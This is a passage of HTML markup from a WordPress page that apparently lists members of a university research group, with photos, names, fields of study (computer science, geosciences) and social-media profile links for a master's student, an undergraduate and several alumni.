h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c243-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c244\" class=\"h-global-transition-all h-heading style-850 style-local-182-c244 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c244\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sivgech Heang</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c245\" class=\"h-text h-text-component style-851 style-local-182-c245 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c246\" class=\"h-text h-text-component style-902 style-local-182-c246 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c247\" class=\"style-855 style-local-182-c247 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sivgech-heang-91842618a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c161\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c161 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c162-outer\">\n            <div data-colibri-id=\"182-c162\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c162 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-844 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c163\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"d-block style-831 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c157-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c157-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-832 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c158\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c159\" class=\"h-text h-text-component style-833 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"style-835 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c164\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c164 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c220\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c220 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c221-outer\">\n            <div data-colibri-id=\"182-c221\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c221 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-926 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c222\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c165\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c165 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n            <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c167\" class=\"d-block style-913 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c167-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c167-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c168\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"style-917 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n            <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c172\" class=\"d-block style-918 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c172-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c172-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c173\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"style-919 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-920 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-921 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-922 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-923 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n            <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c187-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h4 